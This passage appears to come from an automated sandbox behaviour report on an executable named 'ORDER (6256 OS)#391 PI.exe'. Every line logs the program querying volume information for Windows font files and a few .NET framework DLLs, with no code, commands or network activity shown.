Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
